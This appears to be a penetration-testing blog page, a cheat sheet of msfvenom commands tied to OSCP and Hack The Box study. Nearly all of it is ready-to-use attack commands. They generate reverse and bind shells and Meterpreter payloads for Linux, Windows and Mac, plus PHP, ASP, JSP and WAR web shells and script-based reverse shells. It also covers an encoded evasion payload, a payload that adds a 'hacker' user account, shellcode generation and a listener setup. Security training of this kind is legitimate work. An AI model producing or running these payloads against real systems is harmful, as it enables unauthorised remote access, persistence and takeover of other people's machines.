MSFVenom Cheat Sheet

Handler

# Metasploit Handler
use exploit/multi/handler
set PAYLOAD <Payload name>
set RHOST <Remote IP>
set LHOST <Local IP>
set LPORT <Local Port>
run
# Shell Handler
nc -lnvp <Local IP>

0x01 Binaries Payloads

1、Linux

# Linux Meterpreter Reverse Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f elf > shell.elf

# Linux Bind Meterpreter Shell
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > bind.elf

# Linux Bind Shell
msfvenom -p generic/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > term.elf

2、Windows

# Windows Meterpreter Reverse TCP Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe

# Windows Reverse TCP Shell
msfvenom -p windows/shell/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe

# Windows Encoded Meterpreter Windows Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe

# Windows Create User
msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe

3、Mac

# Mac Reverse Shell
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f macho > shell.macho

# Mac Bind Shell
msfvenom -p osx/x86/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f macho > bind.macho

0x02 Web Payloads

# PHP Meterpreter Reverse TCP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php

# ASP Meterpreter Reverse TCP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f asp > shell.asp

# JSP Java Meterpreter Reverse TCP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.jsp

# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f war > shell.war

0x03 Scripting Payloads

# Python Reverse Shell
msfvenom -p cmd/unix/reverse_python LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.py

# Bash Unix Reverse Shell
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh

# Perl Unix Reverse shell
msfvenom -p cmd/unix/reverse_perl LHOST=<local IP Address> LPORT=<Local Port> -f raw > shell.pl

0x04 Shellcode

1、Linux

# Linux Shell Reverse TCP Shellcode（x86）
msfvenom -a x86 --platform linux -p generic/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -b <Badchars e.g:"\x00\x09\x0a\x20"> EXITFUNC=thread -f <language>

# Linux Meterpreter Reverse TCP Shellcode（x86）
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>

2、Windows

# Windows Shell Reverse TCP Shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -b "\x00" EXITFUNC=thread -f <language>

# Windows Meterpreter Reverse TCP Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -b "\x00" -f <language>

3、Mac

# Mac Reverse TCP Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>

amm907

2020-12-15

WEAPONRY

Initialized on

November 4, 2020

-

[ WEAPONRY ]

Kali

-

[ OSCP BATTLE ]

Prepration

Note

-

[ Hack The Box Writeup ]

HTB Linux

HTB Windows

-

[ Cyber Security ]

Skills

Analize

-

[ Essay ]

MSFVenom Cheat Sheet

Handler

0x01 Binaries Payloads

1、Linux

2、Windows

3、Mac

0x02 Web Payloads

0x03 Scripting Payloads

0x04 Shellcode

1、Linux

2、Windows

3、Mac